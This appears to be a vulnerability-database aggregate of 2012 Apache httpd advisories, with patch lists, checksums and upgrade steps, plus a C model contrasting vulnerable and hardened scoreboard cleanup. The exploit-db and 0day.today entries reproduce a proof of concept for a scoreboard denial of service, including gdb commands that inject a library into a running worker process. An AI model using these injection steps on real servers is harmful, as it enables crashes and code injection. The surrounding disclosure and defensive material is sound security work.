[Joe Orton]\n *) SECURITY: CVE-2012-0053 (cve.mitre.org)\n Fix an issue in error responses that could expose "httpOnly" cookies\n when no custom ErrorDocument is specified for status code 400.\n [Eric Covener]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 
13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 packages:\n3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz\n86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz\n\nSlackware 12.1 
packages:\naab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz\n1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz\n\nSlackware 12.2 packages:\nf30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz\n18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz\n\nSlackware 13.0 packages:\nd3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz\n0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nd15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz\n1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz\n49a5e4a73be2328d80cca186efe2f6f7 httpd-2.2.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz\n1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz\n783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz\n8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz\n\nSlackware -current packages:\ne709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz\n97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz\n\nSlackware x86_64 -current packages:\n55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz\n09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz\n\nThen, restart the httpd daemon.", "modified": "2012-02-10T09:43:57", "published": "2012-02-10T09:43:57", "id": "SSA-2012-041-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2012&m=slackware-security.792124", "title": "httpd", "type": "slackware", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:18:00", "bulletinFamily": "unix", "description": "This update of apache2 fixes regressions and several\n security problems:\n\n bnc#728876, fix graceful reload\n\n bnc#741243, CVE-2012-0031: Fixed a scoreboard corruption\n (shared memory segment) by a child that causes a crash of the privileged\n parent (invalid free()) during shutdown.\n\n bnc#743743, CVE-2012-0053: Fixed an issue in error\n responses that could expose "httpOnly" cookies when no\n custom ErrorDocument is specified for status code 400.\n\n bnc#738855, CVE-2007-6750: The "mod_reqtimeout" module was\n backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in your\n existing apache configuration to make it effective, e.g. 
in\n the APACHE_MODULES line in /etc/sysconfig/apache2.\n\n", "modified": "2012-02-28T18:08:26", "published": "2012-02-28T18:08:26", "id": "OPENSUSE-SU-2012:0314-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00026.html", "title": "apache2: fixed various security bugs (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:26:04", "bulletinFamily": "unix", "description": "This update of apache2 and libapr1 fixes regressions and\n several security problems.\n\n * CVE-2012-0031: Fixed a scoreboard corruption (shared\n memory segment) by a child that causes a crash of the privileged parent\n (invalid free()) during shutdown.\n * CVE-2012-0053: Fixed an issue in error responses that\n could expose "httpOnly" cookies when no custom\n ErrorDocument is specified for status code 400.\n * CVE-2007-6750: The "mod_reqtimeout" module was\n backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in your\n existing apache configuration to make it effective, e.g.\n in the APACHE_MODULES line in /etc/sysconfig/apache2. For\n more detailed information, check also the README file.\n\n Also the following bugs have been fixed:\n\n * Fixed init script action "check-reload" to avoid\n potential crashes. bnc#728876\n * An overlapping memcpy() was replaced by memmove() to\n make this work with newer glibcs. bnc#738067 bnc#741874\n * libapr1: reset errno to zero so that a stale value is not\n returned after a new operation has succeeded. 
bnc#739783\n", "modified": "2012-02-18T13:08:15", "published": "2012-02-18T13:08:15", "id": "SUSE-SU-2012:0284-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00016.html", "type": "suse", "title": "Security update for Apache2 (important)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:03:38", "bulletinFamily": "unix", "description": "This update of apache fixes regressions and several\n security problems:\n\n *\n\n bnc#741243, CVE-2012-0031: Fixed a scoreboard\n corruption (shared memory segment) by a child that causes a crash of\n the privileged parent (invalid free()) during shutdown.\n\n *\n\n bnc#743743, CVE-2012-0053: Fixed an issue in error\n responses that could expose "httpOnly" cookies when no\n custom ErrorDocument is specified for status code 400.\n\n *\n\n bnc#736706, the SSL configuration template suggested\n weak ciphers.\n\n *\n\n bnc#738855, CVE-2007-6750: The "mod_reqtimeout" module\n was backported from Apache 2.2.21 to help mitigate the\n "Slowloris" Denial of Service attack.\n\n You need to enable the "mod_reqtimeout" module in\n your existing apache configuration to make it effective,\n e.g. in the APACHE_MODULES line in /etc/sysconfig/apache2.\n", "modified": "2012-03-06T21:08:42", "published": "2012-03-06T21:08:42", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-03/msg00002.html", "id": "SUSE-SU-2012:0323-1", "title": "Security update for Apache2 (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:59", "bulletinFamily": "info", "description": "### *Detect date*:\n07/22/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apache httpd. 
Malicious users can exploit these vulnerabilities to gain privileges, cause denial of service, execute arbitrary code, obtain sensitive information or bypass security restrictions. Below is a complete list of vulnerabilities\n\n### *Affected products*:\nApache httpd 2.0 versions 2.0.64 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Apache changelog](<http://httpd.apache.org/security/vulnerabilities_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2011-3192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>) \n[CVE-2013-1862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862>) \n[CVE-2012-0031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n[CVE-2011-0419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419>) \n[CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>) \n[CVE-2011-3368](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n[CVE-2012-0053](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>)", "modified": "2019-02-13T00:00:00", "published": "2013-07-22T00:00:00", "id": "KLA10065", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10065", "title": "\r KLA10065Multiple vulnerabilities in Apache httpd ", "type": "kaspersky", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "httpd": [{"lastseen": "2018-08-31T00:35:47", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2011-11-02T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:560EB66BD0C9D4921E114954F57484F0", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_setenvif .htaccess 
privilege escalation", "type": "httpd", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2013-07-22T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:CD3865BDB48B91719A525A87DFA73750", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: mod_setenvif .htaccess privilege escalation", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:35:47", "bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2012-01-11T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:98531A1B4917D4CDD88FDEF74307A1F3", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: scoreboard parent DoS", "type": "httpd", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nAn integer overflow flaw was found which, when the mod_setenvif module\nis enabled, could allow local users to gain privileges via a .htaccess\nfile.\n\n", "modified": "2012-01-31T00:00:00", "published": "2011-10-04T00:00:00", "id": "HTTPD:19058D084C7C00E6FB6A3AD068C9416B", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: mod_setenvif .htaccess privilege escalation", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", 
"bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2012-01-31T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:8BA47632F35C9AB31E24EEFA64CB532A", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: scoreboard parent DoS", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "description": "\nA flaw was found in the handling of the scoreboard. An \nunprivileged child process could cause the parent process to crash at \nshutdown rather than terminate cleanly. \n\n", "modified": "2013-07-22T00:00:00", "published": "2011-12-30T00:00:00", "id": "HTTPD:2D6863E2D9663FEAEBBED0A62CE75D64", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: scoreboard parent DoS", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-03-29T15:16:56", "bulletinFamily": "exploit", "description": "Apache 2.2 - Scoreboard Invalid Free On Shutdown. CVE-2012-0031. Dos exploit for Linux platform", "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "EDB-ID:41768", "href": "https://www.exploit-db.com/exploits/41768/", "type": "exploitdb", "title": "Apache 2.2 - Scoreboard Invalid Free On Shutdown", "sourceData": "Source: http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/\r\n\r\n## Introduction\r\n\r\nApache 2.2 webservers may use a shared memory segment to share child process status information (scoreboard) between the child processes and the parent process running as root. 
A child running with lower privileges than the parent process might trigger an invalid free in the privileged parent process during parent shutdown by modifying data on the shared memory segment.\r\n\r\n## Method\r\n\r\nA child process can trigger the bug by changing the value of ap_scoreboard_e sb_type, which resides in the global_score structure on the shared memory segment. The value is usually 2 (SB_SHARED):\r\n\r\ntypedef struct {\r\n int server_limit;\r\n int thread_limit;\r\n ap_scoreboard_e sb_type;\r\n ap_generation_t running_generation; /* the generation of children which\r\n * should still be serving requests.\r\n */\r\n apr_time_t restart_time;\r\n int lb_limit;\r\n} global_score;\r\n\r\nWhen changing the scoreboard type of a shared memory segment to something else, the root process will try to release the shared memory using free during normal shutdown. Since the memory was allocated using mmap, not malloc, the call to free from ap_cleanup_scoreboard (server/scoreboard.c) triggers abort within libc.\r\n\r\napr_status_t ap_cleanup_scoreboard(void *d)\r\n{\r\n if (ap_scoreboard_image == NULL) {\r\n return APR_SUCCESS;\r\n }\r\n if (ap_scoreboard_image->global->sb_type == SB_SHARED) {\r\n ap_cleanup_shared_mem(NULL);\r\n }\r\n else {\r\n free(ap_scoreboard_image->global);\r\n free(ap_scoreboard_image);\r\n ap_scoreboard_image = NULL;\r\n }\r\n return APR_SUCCESS;\r\n}\r\n\r\nAbort output is written to apache default error log:\r\n\r\n[Fri Dec 30 10:19:57 2011] [notice] caught SIGTERM, shutting down\r\n*** glibc detected *** /usr/sbin/apache2: free(): invalid pointer: 0xb76f4008 ***\r\n======= Backtrace: 
=========\r\n/lib/i386-linux-gnu/libc.so.6(+0x6ebc2)[0x17ebc2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x6f862)[0x17f862]\r\n/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18294d]\r\n/usr/sbin/apache2(ap_cleanup_scoreboard+0x29)[0xa57519]\r\n/usr/lib/libapr-1.so.0(+0x19846)[0x545846]\r\n/usr/lib/libapr-1.so.0(apr_pool_destroy+0x52)[0x5449ec]\r\n/usr/sbin/apache2(+0x1f063)[0xa52063]\r\n/usr/sbin/apache2(main+0xeea)[0xa51e3a]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0x129113]\r\n/usr/sbin/apache2(+0x1ef3d)[0xa51f3d]\r\n======= Memory map: ========\r\n00110000-00286000 r-xp 00000000 08:01 132367\r\n\r\nTo reproduce, attach to a www-data (non-root) child process and increment the value at offset 0x10 in the shared memory segment. The search and replace can also be accomplished by compiling LibScoreboardTest.c (http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/LibScoreboardTest.c) and loading it into a child process using gdb --pid [childpid] and following commands:\r\n\r\nset *(int*)($esp+4)=\"/var/www/libExploit.so\"\r\nset *(int*)($esp+8)=1\r\nset $eip=*__libc_dlopen_mode\r\ncontinue\r\n\r\nWithout gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41768/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "description": "### Background\n\nApache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA remote attacker might obtain sensitive information, gain privileges, send requests to unintended servers behind proxies, bypass certain security restrictions, obtain the values of HTTPOnly cookies, or cause a Denial of Service in various ways. \n\nA local attacker could gain escalated privileges.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache HTTP Server users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.2.22-r1\"", "modified": "2012-06-24T00:00:00", "published": "2012-06-24T00:00:00", "id": "GLSA-201206-25", "href": "https://security.gentoo.org/glsa/201206-25", "type": "gentoo", "title": "Apache HTTP Server: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T11:14:09", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-03-29T00:00:00", "published": "2017-03-29T00:00:00", "href": "https://0day.today/exploit/description/27465", "id": "1337DAY-ID-27465", "type": "zdt", "title": "Apache 2.2 - Scoreboard Invalid Free On Shutdown Vulnerability", "sourceData": "Source: http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/\r\n \r\n## Introduction\r\n \r\nApache 2.2 webservers may use a shared memory segment to share child process status information (scoreboard) between the child processes and the parent process running as root. A child running with lower privileges than the parent process might trigger an invalid free in the privileged parent process during parent shutdown by modifying data on the shared memory segment.\r\n \r\n## Method\r\n \r\nA child process can trigger the bug by changing the value of ap_scoreboard_e sb_type, which resides in the global_score structure on the shared memory segment. 
The value is usually 2 (SB_SHARED):\r\n \r\ntypedef struct {\r\n int server_limit;\r\n int thread_limit;\r\n ap_scoreboard_e sb_type;\r\n ap_generation_t running_generation; /* the generation of children which\r\n * should still be serving requests.\r\n */\r\n apr_time_t restart_time;\r\n int lb_limit;\r\n} global_score;\r\n \r\nWhen changing the scoreboard type of a shared memory segment to something else, the root process will try to release the shared memory using free during normal shutdown. Since the memory was allocated using mmap, not malloc, the call to free from ap_cleanup_scoreboard (server/scoreboard.c) triggers abort within libc.\r\n \r\napr_status_t ap_cleanup_scoreboard(void *d)\r\n{\r\n if (ap_scoreboard_image == NULL) {\r\n return APR_SUCCESS;\r\n }\r\n if (ap_scoreboard_image->global->sb_type == SB_SHARED) {\r\n ap_cleanup_shared_mem(NULL);\r\n }\r\n else {\r\n free(ap_scoreboard_image->global);\r\n free(ap_scoreboard_image);\r\n ap_scoreboard_image = NULL;\r\n }\r\n return APR_SUCCESS;\r\n}\r\n \r\nAbort output is written to apache default error log:\r\n \r\n[Fri Dec 30 10:19:57 2011] [notice] caught SIGTERM, shutting down\r\n*** glibc detected *** /usr/sbin/apache2: free(): invalid pointer: 0xb76f4008 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x6ebc2)[0x17ebc2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x6f862)[0x17f862]\r\n/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18294d]\r\n/usr/sbin/apache2(ap_cleanup_scoreboard+0x29)[0xa57519]\r\n/usr/lib/libapr-1.so.0(+0x19846)[0x545846]\r\n/usr/lib/libapr-1.so.0(apr_pool_destroy+0x52)[0x5449ec]\r\n/usr/sbin/apache2(+0x1f063)[0xa52063]\r\n/usr/sbin/apache2(main+0xeea)[0xa51e3a]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0x129113]\r\n/usr/sbin/apache2(+0x1ef3d)[0xa51f3d]\r\n======= Memory map: ========\r\n00110000-00286000 r-xp 00000000 08:01 132367\r\n \r\nTo reproduce, attach to a www-data (non-root) child process and increment the value at offset 0x10 in the shared 
memory segment. The search and replace can also be accomplished by compiling LibScoreboardTest.c (http://www.halfdog.net/Security/2011/ApacheScoreboardInvalidFreeOnShutdown/LibScoreboardTest.c) and loading it into a child process using gdb --pid [childpid] and following commands:\r\n \r\nset *(int*)($esp+4)=\"/var/www/libExploit.so\"\r\nset *(int*)($esp+8)=1\r\nset $eip=*__libc_dlopen_mode\r\ncontinue\r\n \r\nWithout gdb, the mod_setenv exploit demo (2nd attempt) (http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html) could be used to load the code.\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/27465", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
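Worked example, added here by the editor. It is not code from httpd, from the exploit-db/0day.today writeup quoted above, or from any of the advisories on this page. It models the trust-boundary defect behind CVE-2012-0031 as the writeup describes it: the root parent decides at shutdown whether to munmap or free() the scoreboard by reading sb_type, a field that lives in the shared segment every unprivileged child can write. A forked child stands in for an httpd worker (or a CGI/PHP script running with its privileges), corrupts sb_type, and the parent then picks its cleanup path. The free() branch is only reported, not executed, because free() on mmap'd memory is exactly the glibc abort shown in the error log above. Assumptions: the struct field order and SB_SHARED == 2 follow the quoted writeup; the function names, the action codes and the fork-based child are this example's own; the "hardened" variant, which consults a parent-private copy of the type instead of the shared field, illustrates the principle of keeping the decision out of attacker-writable memory and is not a reproduction of the exact upstream patch.

```c
/* Added example: stand-alone model of the httpd scoreboard shutdown bug
 * (CVE-2012-0031). Not code from httpd or from the quoted writeup.
 * Build on Linux/glibc with: cc -o sbmodel sbmodel.c
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/* SB_SHARED == 2 follows the quoted writeup ("the value is usually 2");
 * the real enum is ap_scoreboard_e in httpd's scoreboard.h (assumption). */
enum { SB_SHARED = 2 };

/* Same field order as the global_score struct quoted in the writeup. */
typedef struct {
    int server_limit;
    int thread_limit;
    int sb_type;
    int running_generation;
    long long restart_time;
    int lb_limit;
} global_score;

/* What the parent would do at shutdown (codes are this example's own). */
enum cleanup_action {
    ACTION_UNMAP_SHM = 0, /* correct: release the mmap'd segment */
    ACTION_FREE = 1       /* free() on mmap'd memory: the glibc abort in the log */
};

/* Vulnerable shape of ap_cleanup_scoreboard: the branch is chosen from a field
 * stored in the shared segment, i.e. memory every child process can write. */
int vulnerable_cleanup_decision(const global_score *shared)
{
    return shared->sb_type == SB_SHARED ? ACTION_UNMAP_SHM : ACTION_FREE;
}

/* Hardened shape: the parent decides from its own private record of how it
 * allocated the scoreboard, so nothing a child writes can change the branch.
 * Illustrates the principle of the fix, not the exact upstream patch. */
int hardened_cleanup_decision(int parent_private_sb_type)
{
    return parent_private_sb_type == SB_SHARED ? ACTION_UNMAP_SHM : ACTION_FREE;
}

/* One shutdown scenario: the parent maps a shared scoreboard, a forked child
 * corrupts sb_type (the "increment the value" step of the writeup), then the
 * parent picks its cleanup path. Returns a cleanup_action, or -1 if a system
 * call fails. The free() branch is reported, never executed. */
int simulate_shutdown(int use_hardened_cleanup)
{
    global_score *shared = mmap(NULL, sizeof *shared, PROT_READ | PROT_WRITE,
                                MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (shared == MAP_FAILED)
        return -1;
    memset(shared, 0, sizeof *shared);
    shared->sb_type = SB_SHARED;            /* written by the parent at startup */
    int parent_private_sb_type = SB_SHARED; /* the hardened parent's own copy */

    pid_t child = fork();
    if (child < 0) {
        munmap(shared, sizeof *shared);
        return -1;
    }
    if (child == 0) {
        /* Unprivileged child: has write access to the shared segment. */
        shared->sb_type = SB_SHARED + 1;
        _exit(0);
    }
    waitpid(child, NULL, 0);

    int action = use_hardened_cleanup
                     ? hardened_cleanup_decision(parent_private_sb_type)
                     : vulnerable_cleanup_decision(shared);

    munmap(shared, sizeof *shared); /* the only release this model performs */
    return action;
}

int main(void)
{
    printf("vulnerable parent after child tampering: %s\n",
           simulate_shutdown(0) == ACTION_FREE ? "free() on mmap'd memory (abort)"
                                               : "clean unmap");
    printf("hardened parent after child tampering:   %s\n",
           simulate_shutdown(1) == ACTION_FREE ? "free() on mmap'd memory (abort)"
                                               : "clean unmap");
    return 0;
}
```

The point the model makes is that the parent's control flow depended on data owned by a lower-privilege process; the same check performed against state the parent keeps in its own address space cannot be steered by a worker, which is why the advisories rate this a local parent-crash DoS rather than something a hardened cleanup path would expose.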